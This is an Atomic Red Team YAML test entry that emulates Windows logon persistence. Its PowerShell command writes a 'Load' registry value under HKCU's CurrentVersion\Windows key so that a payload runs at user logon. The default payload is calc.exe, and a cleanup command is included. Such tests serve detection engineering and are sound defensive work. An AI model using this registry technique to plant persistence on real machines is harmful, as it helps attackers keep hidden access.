Atomic Red Team

T1547.yaml

- name: 'HKCU - Add Registry Key Under CurrentVersion\Windows'
  description: |
    This test attempts to add a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows 
    which points to a potential payload "calc.exe". This can be indicative of an attacker trying to achieve persistence or other malicious objectives.
    References:
    - https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
    - https://persistence-info.github.io/Data/windowsload.html
  supported_platforms:
  - windows
  input_arguments:
    payload:
      description: path to the malicious executable
      type: string
      default: C:\Windows\System32\calc.exe
  executor:
    command: |
      $keyPath = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
      if(-not (Test-Path $keyPath)) {
          New-Item -Path $keyPath -Force
      }
      $oldValue = if (Get-ItemProperty -Path $keyPath -Name 'Load' -ErrorAction SilentlyContinue) { Get-ItemPropertyValue -Path $keyPath -Name 'Load' } else { $null }
      Set-ItemProperty -Path $keyPath -Name "Load-backup" -Value $oldValue
      Set-ItemProperty -Path $keyPath -Name "Load" -Value "#{payload}"
    cleanup_command: |
      $keyPath = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows"
      $oldValue = Get-ItemPropertyValue -Path $keyPath -Name 'Load-backup'
      Set-ItemProperty -Path $keyPath -Name "Load" -Value $oldValue
      Remove-ItemProperty -Path $keyPath -Name 'Load-backup'
    name: powershell
    elevation_required: false